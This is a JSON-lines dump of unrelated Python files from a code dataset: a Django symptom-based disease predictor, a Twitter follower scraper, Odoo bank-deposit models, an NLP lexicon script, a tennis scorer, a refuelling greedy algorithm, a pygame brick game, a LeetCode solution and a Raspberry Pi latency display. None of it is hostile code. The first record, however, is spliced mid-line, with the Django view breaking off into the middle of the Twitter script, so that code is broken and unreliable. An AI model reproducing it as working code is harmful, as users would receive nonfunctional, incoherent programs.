+{"seq_id":"451018817","text":"from django.shortcuts import render\nfrom . import forms\nimport pickle\nfrom DiseasePredictor import settings\nimport os\n\nBASE_DIR = settings.BASE_DIR\ncommon = pickle.load(open(os.path.join(BASE_DIR,'media','data','common.p'), \"rb\"))\nuncommon = pickle.load(open(os.path.join(BASE_DIR,'media','data','uncommon.p'), \"rb\"))\nall_ordered = pickle.load(open(os.path.join(BASE_DIR,'media','data','all_ordered.p'), \"rb\"))\n\ndef input_view(request):\n\n if request.method==\"POST\":\n\n symptoms_form = forms.Symptom_Form(data = request.POST)\n if symptoms_form.is_valid():\n disease_prediction = ml(symptoms_form.cleaned_data)\n print(symptoms_form.cleaned_data)\n if len(disease_prediction)==1:\n return render(request, \"result.html\", {'multiple': 0, 'prognosis': disease_prediction[0][0]})\n else:\n return render(request, \"result.html\", {'multiple': 1, 'prognosis': disease_prediction})\n \n return render(request, \"something_wrong.html\", {'message' : \"Something went wrong!\"})\n \n return render(request, \"input.html\",{'form': forms.Symptom_Form, 'common': common,'uncommon':uncommon, 'length':7})\n\n\n\n\ndef ml(clean_data):\n values_1 = [ i for i in clean_data.values() ]\n l = [ all_ordered[i] for i in values_1 if i!='' ]\n \n test_list = [ 0 for i in range(132) ]\n for i in l :\n test_list[i] = 1\n \n model = None\n label_coder = None\n # with open('media/models/model_rf.sav', 'rb') as fp:\n with open('media/models/model_rf_64.sav', 'rb') as fp:\n model = pickle.load(fp)\n # with open('media/models/label_coder.sav', 'rb') as fp:\n with open('media/models/label_coder_64.sav', 'rb') as fp:\n label_coder = pickle.load(fp)\n ls = []\n threshold = 15\n\n result = model.predict_proba([test_list])\n for i in range(0,len(result[0])):\n if result[0][i]!=0:\n ls.append((label_coder.inverse_transform([i,]),(result[0][i]*100)))\n\n ls = sorted([ (i[0][0],int(i[1])) for i in ls if i[1]>=threshold ] , reverse=True, key=lambda x: x[1])\n if ls[0][1]=10:\n # print u.followers_count\n if u.followers_count >= 0:\n list.write(u.screen_name + '\\n')\n\n flag += 1\n else:\n u = next(user)\n except:\n time.sleep(15 * 60)\n print(\"we got a timeout\")\n u = next(user)\n list.write(u.screen_name + '\\n')\n flag += 1\nlist.close()\n\n#public_tweets = api.user_timeline('LeoDiCaprio')\n\n#for tweet in public_tweets:\n# print tweet.text\n\n","sub_path":"src/get_user_id.py","file_name":"get_user_id.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"369145002","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass BankRecordsCancel(models.TransientModel):\n _name = 'account.bank.records.cancel'\n\n _description = _('Ventana para cancelar registros bancarios')\n\n description = fields.Text('Descripción', required=True)\n record_id = fields.Many2one('account.payment', 'Registro bancario')\n\n @api.multi\n def confirm_cancel(self):\n \"\"\"\n Cancelamos depósito/transferencia (Registros bancarios)\n :return:\n \"\"\"\n move = self.record_id.move_id\n move.reverse_moves(move.date, move.journal_id or False)\n move.write({'state': 'cancel', 'ref': self.description})\n self.record_id.update({'state': 'cancelled'})\n return True\n\n\nclass Payment(models.Model):\n _inherit = \"account.payment\"\n\n @api.onchange('amount', 'currency_id')\n def _onchange_amount(self):\n \"\"\"\n MM: Lo cambiamos porqué sale error en moneda\n \"\"\"\n return\n\n @api.multi\n def action_button_cancel(self):\n \"\"\"\n Abrimos venta emergente para cancelar depósito/transferencia si està\n en estado borrador cancelamos la misma\n :return: dict\n \"\"\"\n if self.state == 'draft':\n return self.write({'state': 'cancelled'})\n context = {\n 'default_record_id': self.id\n }\n return {\n 'name': _(\"Explique la razón\"),\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': 'account.bank.records.cancel',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n 'context': context\n }\n\n @api.model\n def create(self, vals):\n \"\"\"\n MM: Creamos nuevo registro y validamos período contable\n :param vals:\n :return: object\n \"\"\"\n if 'date_payment' in vals:\n self.env['account.fiscal.year'].valid_period(vals['date_payment'])\n res = super(Payment, self).create(vals)\n return res\n\n @api.multi\n def post_transfer(self):\n \"\"\"\n Confirmamos la transferencia, creamos el asiento contable con los datos ingresados\n :return:\n \"\"\"\n company = self.company_id\n domain = [\n ('name', '=', 'Transferencia bancaria'),\n ('company_id', '=', company.id)\n ]\n journal = self.env['account.journal'].search(domain, limit=1)\n if not journal:\n raise UserError(_(\"No está definido el diario (Transferencia bancaria) para compañía: %s\") % company.name)\n move = self.env['account.move'].create({\n 'journal_id': journal.id,\n 'date': self.payment_date,\n 'ref': self.communication or '/'\n })\n self.env['account.move.line'].with_context(check_move_validity=False).create(\n {'name': self.communication,\n 'journal_id': journal.id,\n 'account_id': self.journal_id.default_debit_account_id.id,\n 'move_id': move.id,\n 'credit': 0.0,\n 'debit': self.amount,\n 'date': self.payment_date,\n })\n self.env['account.move.line'].with_context(check_move_validity=True).create(\n {'name': _(\"De \") + self.journal_id.name + _(\" a \") + self.destination_journal_id.name,\n 'journal_id': journal.id,\n 'account_id': self.destination_journal_id.default_credit_account_id.id,\n 'move_id': move.id,\n 'credit': self.amount,\n 'debit': 0.0,\n 'date': self.payment_date\n })\n move.post()\n return self.write({\n 'state': 'posted',\n 'name': move.name,\n 'move_id': move.id\n })\n\n @api.multi\n def unlink(self):\n for record in self:\n if record.move_id:\n raise UserError(_(\n 'No puedes borrar un registro bancario con asiento contable.'))\n return super(Payment, self).unlink()\n\n name = fields.Char(readonly=True, copy=False, default=\"Nuevo\") # CM\n journal_id = fields.Many2one('account.journal', domain=None) # CM TODO: Revisar soló salgan diarios tipo banco\n move_id = fields.Many2one('account.move', string=\"Asiento contable\", readonly=True)\n company_id = fields.Many2one('res.company', related=False, string='Compañía', readonly=False,\n default=lambda self: self.env.user.company_id) # CM\n # Campos para depósitos bancarios\n type_deposit = fields.Selection([\n ('cash', 'Depósito directo (Efectivo)'),\n ('external_checks', 'Cheques externos')\n ], string=\"Tipo de depósito\", default='cash')\n\n def _get_move_lines(self, move_line, move_id):\n \"\"\"\n Creamos líneas de movimiento contable dependiendo del tipo de depósito\n :return:\n \"\"\"\n if self.type_deposit == 'cash':\n for line in self.deposit_line_cash:\n move_line.create({\n 'name': line.reference or '/',\n 'journal_id': move_id.journal_id.id,\n 'account_id': line.account_id.id,\n 'move_id': move_id.id,\n 'debit': 0.0,\n 'credit': line.amount,\n 'date': self.payment_date,\n })\n if self.type_deposit == 'external_checks':\n for line in self.deposit_line_external_checks:\n move_line.create({\n 'name': \"%s: %s\" % (line.bank_id.name, line.check_number),\n 'journal_id': move_id.journal_id.id,\n 'account_id': line.account_id.id,\n 'move_id': move_id.id,\n 'debit': 0.0,\n 'credit': line.amount,\n 'date': self.payment_date,\n })\n\n @api.multi\n def post_deposit(self):\n \"\"\"\n Confirmamos el depósito, creamos el asiento contable con los datos ingresados\n :return:\n \"\"\"\n company = self.company_id\n domain = [\n ('name', '=', 'Depósito bancario'),\n ('company_id', '=', company.id)\n ]\n journal = self.env['account.journal'].search(domain, limit=1)\n if not journal:\n raise UserError(_(\"No está definido el diario (Depósito bancario) para compañía: %s\") % company.name)\n move_id = self.env['account.move'].create({\n 'journal_id': journal.id,\n 'date': self.payment_date,\n 'ref': self.communication or '/'\n })\n move_line = self.env['account.move.line'].with_context(check_move_validity=False)\n self._get_move_lines(move_line, move_id) # Creamos líneas contables\n # Creamos línea de acreditación a la cuenta bancaria del diario\n self.env['account.move.line'].with_context(check_move_validity=True).create({\n 'name': \"%s: %s\" % (self.journal_id.name, self.communication or '/'),\n 'journal_id': journal.id,\n 'account_id': self.journal_id.default_credit_account_id.id,\n 'move_id': move_id.id,\n 'debit': self.amount,\n 'credit': 0.0,\n 'date': self.payment_date,\n })\n move_id.post()\n return self.write({\n 'state': 'posted',\n 'name': move_id.name,\n 'move_id': move_id.id\n })\n\n def _get_amount(self):\n total = 0.00\n if self.type_deposit == 'external_checks':\n for line in self.deposit_line_external_checks:\n total += line.amount\n if self.type_deposit == 'cash':\n for line in self.deposit_line_cash:\n total += line.amount\n return total\n\n @api.multi\n def load_amount(self):\n \"\"\"\n Sumar monto de cada línea de depósito dependiendo del tipo\n :return:\n \"\"\"\n total = self._get_amount()\n return self.update({'amount': total})\n\n deposit_line_cash = fields.One2many('account.deposit.line.cash', 'payment_id', readonly=True,\n states={'draft': [('readonly', False)]},\n string='Líneas de efectivo')\n deposit_line_external_checks = fields.One2many('account.deposit.line.external.checks', 'payment_id', readonly=True,\n states={'draft': [('readonly', False)]},\n string='Líneas de cheques externos')\n\n\nclass DepositLineCash(models.Model):\n _name = 'account.deposit.line.cash'\n _rec_name = 'account_id'\n\n _description = _('Lineas de depósito directo')\n\n account_id = fields.Many2one('account.account', 'Cuenta', required=True)\n reference = fields.Char('Referencia')\n amount = fields.Float('Monto', required=True)\n payment_id = fields.Many2one('account.payment', string=\"Depósito\", ondelete=\"cascade\")\n\n\nclass DepositLineExternalChecks(models.Model):\n _name = 'account.deposit.line.external.checks'\n _rec_name = 'bank_id'\n\n _description = _('Lineas de depósito de cheuqes externos')\n\n bank_id = fields.Many2one('res.bank', string='Banco', required=True)\n check_account = fields.Char('No. Cuenta', required=True)\n check_number = fields.Char('No. Cheque', required=True)\n drawer = fields.Char('Girador', required=True)\n account_id = fields.Many2one('account.account', 'Cuenta', required=True)\n amount = fields.Float('Monto', required=True)\n payment_id = fields.Many2one('account.payment', string=\"Depósito\", ondelete=\"cascade\")\n","sub_path":"eliterp_account/models/account_bank_records.py","file_name":"account_bank_records.py","file_ext":"py","file_size_in_byte":9676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"263710649","text":"import sys\r\nimport os\r\nfrom operator import itemgetter, attrgetter\r\n#from dataprocess import *\r\nimport string\r\nfrom utils import *\r\nfrom nltk.stem import *\r\n\r\nclass Subjword:\r\n def __init__(self):\r\n self.type = \"\"\r\n self.polarity = \"\"\r\n self.word = \"\"\r\n self.pos = \"\"\r\n self.stem = \"\"\r\n\r\nclass CRFInstance:\r\n def __init__(self):\r\n self.words = []\r\n self.pos = []\r\n self.tags = []\r\n self.attr = []\r\n \r\n def buildInst(self, crfstr):\r\n lines = crfstr.rstrip('\\n').split('\\n')\r\n for line in lines:\r\n fields = line.split('\\t')\r\n self.words.append(fields[0])\r\n self.pos.append(fields[1])\r\n self.tags.append(fields[len(fields)-1])\r\n attrlist = []\r\n for i in range(2,len(fields)-1):\r\n attrlist.append(fields[i])\r\n self.attr.append(attrlist)\r\n def toString(self):\r\n crfstr = \"\"\r\n for i in range(len(self.words)):\r\n crfstr += self.words[i]+\"\\t\"+self.pos[i]+\"\\t\"\r\n for j in range(len(self.attr[i])):\r\n crfstr += self.attr[i][j]+\"\\t\"\r\n crfstr += self.tags[i]+\"\\n\"\r\n return crfstr\r\n\r\ndef loadSubjLexicon(inputfile):\r\n subjdict = {}\r\n posdict = {}\r\n for line in open(inputfile, 'r'):\r\n fields = line.rstrip('\\n').split(' ')\r\n entry = Subjword()\r\n for i in range(len(fields)):\r\n subfields = fields[i].split('=')\r\n if len(subfields) != 2:\r\n #print fields[i]\r\n continue\r\n attr = subfields[0]\r\n value = subfields[1]\r\n if attr == \"word1\":\r\n entry.word = value\r\n elif attr == \"type\":\r\n entry.type = value\r\n elif attr == \"pos1\":\r\n entry.pos = value\r\n posdict[value] = 1\r\n elif attr == \"stemmed1\":\r\n entry.stem = value\r\n elif attr == \"priorpolarity\":\r\n entry.polarity = value\r\n key = entry.word+\"-\"+entry.pos\r\n subjdict[key] = entry\r\n #print posdict\r\n #print len(subjdict)\r\n return subjdict\r\n\r\ndef loadCRFdata(crffile):\r\n rf = open(crffile, 'r')\r\n lines = rf.readlines()\r\n instances = []\r\n inststr = \"\"\r\n for i in range(len(lines)):\r\n if lines[i] == '\\n':\r\n inst = CRFInstance()\r\n inst.buildInst(inststr)\r\n instances.append(inst)\r\n inststr = \"\"\r\n else:\r\n inststr += lines[i]\r\n return instances\r\n\r\ndef genNewCRFdata(infile, outfile):\r\n wf = open(outfile, 'w')\r\n instances = loadCRFdata(infile)\r\n for inst in instances:\r\n newstr = addSubj(inst)\r\n wf.write(newstr+\"\\n\")\r\n wf.close()\r\n \r\ndef getSubjtype(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'v'\r\n else:\r\n pos = \"anypos\"\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.type\r\n else:\r\n if wordnet_pos != '':\r\n word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.type\r\n return \"\"\r\n\r\ndef wordnetStem(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'v'\r\n else:\r\n pos = \"anypos\"\r\n if wordnet_pos != '':\r\n word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n return word\r\n\r\ndef getSubjPolarity(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'v'\r\n else:\r\n pos = \"anypos\"\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.polarity\r\n else:\r\n if wordnet_pos != '':\r\n word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.polarity\r\n return \"\"\r\n\r\ndef addSubj(inst):\r\n for i in range(len(inst.words)):\r\n subjtype = getSubjtype(inst.words[i], inst.pos[i])\r\n if subjtype != \"\":\r\n inst.attr[i].append(subjtype)\r\n return inst.toString()\r\n\r\nsubjdict = {}\r\nwnl = WordNetLemmatizer()\r\n#subjdict = loadSubjLexicon(\"/Users/bishan/Dropbox/subjectivity_clues_hltemnlp05/subjclueslen1-HLTEMNLP05.tff\")\r\nsubjdict = loadSubjLexicon(\"subjclueslen1-HLTEMNLP05.tff\")\r\n\r\nif __name__ == \"__main__\":\r\n #path = \"/home/bishan/Dropbox/535doc/\"\r\n #path = \"/Users/bishan/Dropbox/experiment/\"\r\n #path=\"/Users/bishan/Dropbox/MPQA2.0/crfdata/\"\r\n #path=\"/Users/bishan/projects/SEMTASK/semdata/SMT/\"\r\n #path = \"/Users/bishan/projects/OpSum_data/docs/\"\r\n \r\n #genNewCRFdata(path+\"dse_target_train.crf\",path+\"subj_dse_target_train.crf\")\r\n #genNewCRFdata(path+\"dse_target_test.crf\",path+\"subj_dse_target_test.crf\")\r\n #genNewCRFdata(path+\"all_train.crf\",path+\"subj_all_train.crf\")\r\n #genNewCRFdata(path+\"all_test.crf\",path+\"subj_all_test.crf\")\r\n \r\n #genNewCRFdata(path+\"dse_train_basic.crf\",path+\"subj_dse_train.crf\")\r\n #genNewCRFdata(path+\"dse_test_basic.crf\",path+\"subj_dse_test.crf\")\r\n \r\n #genNewCRFdata(path+\"target_train_basic.crf\",path+\"subj_target_train.crf\")\r\n #genNewCRFdata(path+\"target_test_basic.crf\",path+\"subj_target_test.crf\")\r\n \r\n #genNewCRFdata(path+\"dse_train.crf\",path+\"subj_dse_train.crf\")\r\n #genNewCRFdata(path+\"dse_test.crf\",path+\"subj_dse_test.crf\")\r\n \r\n genNewCRFdata(sys.argv[1],sys.argv[2])\r\n \r\n '''\r\n #cats = [\"MSRpar\", \"MSRvid\", \"SMTeuroparl\", \"surprise.OnWN\", \"surprise.SMTnews\"]\r\n cats = [\"OnWN\", \"FNWN\", \"headlines\", \"SMT\"]\r\n for cat in cats:\r\n path=\"/Users/bishan/projects/SEMTASK/semdata_test/\"+cat+\"/\"\r\n genNewCRFdata(path+\"all_train.crf\",path+\"subj_all_train.crf\")\r\n genNewCRFdata(path+\"all_test.crf\",path+\"subj_all_test.crf\")\r\n '''\r\n '''\r\n genNewCRFdata(path+\"ese_train.crf\",path+\"subj_ese_train.crf\")\r\n genNewCRFdata(path+\"ese_test.crf\",path+\"subj_ese_test.crf\")\r\n \r\n genNewCRFdata(path+\"dse_train.crf\",path+\"subj_dse_train.crf\")\r\n genNewCRFdata(path+\"dse_test.crf\",path+\"subj_dse_test.crf\")\r\n \r\n genNewCRFdata(path+\"agent_train.crf\",path+\"subj_agent_train.crf\")\r\n genNewCRFdata(path+\"agent_test.crf\",path+\"subj_agent_test.crf\")\r\n '''","sub_path":"pipeline (executables)/Step 3 - add lexicon features/subjectivity.py","file_name":"subjectivity.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"163037001","text":"# -*- coding: utf-8 -*-\nclass Match:\n\n def __init__(self, j1, j2, sets):\n self.p1 = j1\n self.p2 = j2\n self.sets = sets\n self.p1_wins = 0\n self.p2_wins = 0\n self.p1_sets = ['', '', '', '', '']\n self.p2_sets = ['', '', '', '', '']\n self.result= (self.p1_wins)-(self.p2_wins)\n self.result1= (self.p2_wins)-(self.p2_wins)\n\n def score(self):\n lista=[self.p1_wins,self.p2_wins]\n lista1=[]\n lisreturn=[lista,lista1]\n if self.p1_wins == 0 and self.p2_wins == 0:\n return lista\n\n if self.sets == 3:\n\n if (result==2):\n lista1=[self.p1_sets[0], self.p1_sets[1]]\n return lisreturn\n if (result== 1):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2]]\n return lisreturn\n if (result1== 2):\n lista1=[self.p2_sets[0], self.p2_sets[1]]\n return lisreturn\n if (result1 == 1):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2]]\n return lisreturn\n\n elif self.sets == 5:\n if (result == 3):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2]]\n return lisreturn\n if (result == 2):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2], self.p1_sets[3]]\n return lisreturn\n if (result == 1):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2], self.p1_sets[3], self.p1_sets[4]]\n return lisreturn \n if (result1 == 3):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2]]\n return lisreturn\n if (result1 == 2):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2], self.p2_sets[3]]\n return lisreturn\n if (result1 == 1):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2], self.p2_sets[3], self.p2_sets[4]]\n return lisreturn\n\n def winer(self, jugador, set_num, points1, points2):\n ganador=1\n if self.p1 == jugador:\n self.p1_wins = self.p1_wins + ganador\n self.p1_sets[set_num - 1] = points1 + '-' + points2\n self.p2_sets[set_num - 1] = points2 + '-' + points1\n\n else:\n self.p2_wins = self.p2_wins + ganador\n self.p2_sets[set_num - 1] = points1 + '-' + points2\n self.p1_sets[set_num - 1] = points2 + '-' + points1\n","sub_path":"app/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"259562983","text":"from decorators import tiempoDeEjecucion\nimport math\n\ndef mostrar(solu,distacias):\n cont=0\n print(\"Debe parar en: \")\n for i in range(len(solu)):\n if (solu[i]==True):\n print(i+1)\n cont+=1\n print(\"cantidad minima de paradas: \", cont)\n\ndef avido(distancias, n, recorrido, gasol, solu):\n solu= [None] * gasol \n for i in range(gasol):\n recorrido=recorrido + distancias[i]\n if (recorrido>n): #cuando se pasa del limite que le permite el tanque \n num=i \n num=num-1 #si se paso es porque en la posicion anterior (i-1) debe recargar \n solu[num]=True #ponemos true en la posicion de esa parada donde recarga\n recorrido=distancias[i] \n return mostrar(solu, distancias)\n\n\n@tiempoDeEjecucion(\"avidos\")\ndef avidos():\n distancias=[23, 55, 47, 36,11, 56, 78,23, 45, 71, 43, 19, 29, 65, 72, 34, 45, 76, 80, 21, 18]\n n=80\n gasol=len(distancias)\n solu=[]\n avido(distancias, n, 0, gasol, solu)\n\navidos()\n","sub_path":"camionerosConAvidos.py","file_name":"camionerosConAvidos.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"177193619","text":"import os, sys, pygame, random, threading\nfrom pygame.locals import *\n\ntry:\n import pygame._view\nexcept:\n pass\n\nfrom az_math import Vector2\nfrom brick_brick import Brick\nfrom ball_brick import Ball\nfrom paddle_brick import Paddle\n\nclass BrickMain(object):\n def __init__(self):\n self.running = True\n self.paused = False\n self.dt = 0\n\n self.game_size = (800, 400)\n self.screen = pygame.display.set_mode(self.game_size)\n pygame.display.set_caption(\"%sx%s\" % self.game_size)\n\n self.background = pygame.Surface(self.game_size)\n self.background.convert()\n self.background.fill((0,0,0))\n self.clock = pygame.time.Clock()\n self.boxes = []\n self.numboxes = 40\n self.boxsize = (100, 20)\n\n def initObjects(self):\n self.paddle = Paddle(self, pos=Vector2(50, self.game_size[1] - 20))\n self.ball = Ball(self, pos=Vector2(50, 300))\n\n random.seed()\n for num in range(self.numboxes):\n boxesperline = self.game_size[0] / self.boxsize[0] \n posx = 100 * (num % boxesperline)\n posy = 20 * (num / boxesperline)\n colorRed = random.randint(0, 255)\n colorGreen = random.randint(0, 255)\n colorBlue = random.randint(0, 255)\n box = Brick( \\\n self, \\\n pos=Vector2(posx, posy), \\\n size=self.boxsize, \\\n color=(colorRed, colorGreen, colorBlue) \\\n )\n self.boxes.append(box)\n\n def main(self):\n\n self.initObjects()\n\n\n while self.running:\n dt = self.clock.tick(60)\n self.dt = 1/float(dt)\n\n self.listen()\n\n self.update()\n\n self.draw() \n\n if len(self.boxes) <= 0:\n self.running = False\n\n pygame.display.flip()\n\n sys.exit(0)\n\n def update(self):\n if not self.paused:\n self.ball.update(self.dt)\n self.paddle.update(self.dt)\n\n def draw(self):\n self.screen.blit(self.background, (0, 0))\n\n self.drawBackground()\n\n for box in self.boxes:\n box.draw(self.screen)\n\n self.ball.draw(self.screen)\n\n self.paddle.draw(self.screen)\n\n def drawBackground(self):\n font = pygame.font.Font(\"freesansbold.ttf\", 16)\n\n self.screen.blit( \\\n font.render(\"FPS: %s\" % int(self.clock.get_fps()), 1, (255,255,255)), \\\n (0, self.game_size[1] - 16) \\\n )\n \n def removeBrick(self, brick):\n listsansbrick = [val for val in self.boxes if val != brick]\n self.boxes = listsansbrick\n\n def listen(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = 0\n sys.exit(0)\n elif event.type == pygame.KEYDOWN:\n if event.key == K_q:\n self.running= 0\n if event.key == K_p:\n self.paused = not self.paused\n if event.key == K_a or event.key == K_d:\n self.paddle.handleKeyDown(event.key)\n elif event.type == pygame.KEYUP:\n if event.key == K_a or event.key == K_d:\n self.paddle.handleKeyUp(event.key)\n else:\n pygame.event.pump()\n\nif __name__ == '__main__':\n pygame.init()\n am = BrickMain()\n am.main()","sub_path":"main_brick.py","file_name":"main_brick.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"342805853","text":"\"\"\" 3. Longest Substring Without Repeating Characters\n\nTag: Hash Table, Two Pointers, String\n\n################################################################################\n# Author: Weikun Han \n# Crate Date: 05/31/2018\n# Update:\n# Reference: https://leetcode.com/problems/longest-substring-without-repeating-characters/description/\n################################################################################\n\"\"\"\n\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n res = 0\n worddict = {}\n left = 0\n \n for i, n in enumerate(s):\n if n not in worddict.keys():\n worddict[n] = i + 1\n \n if res < (i - left + 1):\n res = i - left + 1\n else:\n if worddict[n] > left:\n left = worddict[n]\n \n # Consider case 'abcdadc' need check first\n worddict[n] = i + 1\n\n if res < (i - left + 1):\n res = i - left + 1\n \n return res\n \n","sub_path":"003_longest_substring_without_repeating_characters.py","file_name":"003_longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"242952979","text":"#include GPIO and Timer Library \nimport RPi.GPIO as GPIO\nimport time\nimport commands\nimport re #Import regular expressions\nimport threading\n\nlatency = 70.0 #initialization global latency variable\n\nclass dotMatrix(object):\n def __init__(self):\n #define Raspberry Pi GPIO number\n self.sleeptime=0.3\n self.ROW1=22\n self.ROW2=8\n self.ROW3=24\n self.ROW4=9\n self.ROW5=14\n self.ROW6=23\n self.ROW7=4\n self.COL1=11\n self.COL2=15\n self.COL3=18\n self.COL4=10\n self.COL5=27\n \n self.ColArray=[11,15,18,10,27]\n self.RowArray=[22,8,24,9,14,23,4]\n\n #Raspberry Pi GPIO initalization\n GPIO.setmode( GPIO.BCM )\n GPIO.setup(self.COL1, GPIO.OUT)\n GPIO.setup(self.COL2, GPIO.OUT)\n GPIO.setup(self.COL3, GPIO.OUT)\n GPIO.setup(self.COL4, GPIO.OUT)\n GPIO.setup(self.COL5, GPIO.OUT)\n GPIO.setup(self.ROW1, GPIO.OUT)\n GPIO.setup(self.ROW2, GPIO.OUT)\n GPIO.setup(self.ROW3, GPIO.OUT)\n GPIO.setup(self.ROW4, GPIO.OUT)\n GPIO.setup(self.ROW5, GPIO.OUT)\n GPIO.setup(self.ROW6, GPIO.OUT)\n GPIO.setup(self.ROW7, GPIO.OUT)\n\n def clear(self):\n #set all GPIO output to LOW\n GPIO.output(self.COL1, GPIO.LOW)\n GPIO.output(self.COL2, GPIO.LOW)\n GPIO.output(self.COL3, GPIO.LOW)\n GPIO.output(self.COL4, GPIO.LOW)\n GPIO.output(self.COL5, GPIO.LOW)\n GPIO.output(self.ROW1, GPIO.LOW)\n GPIO.output(self.ROW2, GPIO.LOW)\n GPIO.output(self.ROW3, GPIO.LOW)\n GPIO.output(self.ROW4, GPIO.LOW)\n GPIO.output(self.ROW5, GPIO.LOW)\n GPIO.output(self.ROW6, GPIO.LOW)\n GPIO.output(self.ROW7, GPIO.LOW)\n time.sleep(self.sleeptime)\n\n def bringMeLight(self,t):\n for n in range(0,12):\n arr = [1,2,3,4,5,6,7,6,5,4,3,2,1]\n arr2 = [1,2,3,4,5,6,7]\n arr2.remove(arr[n])\n GPIO.output(self.COL1, GPIO.LOW)\n GPIO.output(self.COL2, GPIO.LOW)\n GPIO.output(self.COL3, GPIO.HIGH)\n GPIO.output(self.COL4, GPIO.LOW)\n GPIO.output(self.COL5, GPIO.LOW)\n GPIO.output(self.RowArray[arr[n] - 1], GPIO.LOW) \n for ind in range(0,6):\n GPIO.output(self.RowArray[arr2[ind] - 1], GPIO.HIGH)\n time.sleep(t)\n\ndef log_write(log_text):\n with open(\"/home/pi/speedometer/log.txt\", \"a\") as myfile:\n myfile.write(log_text)\n myfile.close()\n return\n\ndef ping_google(tm): #if contains 'bytes from' pass\n global latency\n while 1:\n ping_once = \"ping 173.194.44.33 -c 1\"\n output = commands.getstatusoutput(ping_once)\n if re.search('bytes from', output[1]):\n split = output[1].split('time=')\n split = split[1].split(\" \")\n log_write(split[0] + \"\\n\")\n time.sleep(tm)\n latency = split[0]\n #print latency\n\ndef main():\n global latency\n matrix=dotMatrix()\n pingSleep = 2 # ping timeout \n t1 = threading.Thread(target = ping_google, args=(pingSleep,))\n t1.start()\n \n #t1.join()\n while 1:\n latency = float(latency)\n #print latency\n if latency < 55.0:\n t = 0.04\n if latency > 55.0 and latency < 65.0:\n t = 0.08\n if latency > 65.0 and latency < 75.0:\n t = 0.12\n if latency > 75.0:\n t = 0.55\n #print t\n matrix.bringMeLight(t)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"w1_speedometer/bring_light.py","file_name":"bring_light.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
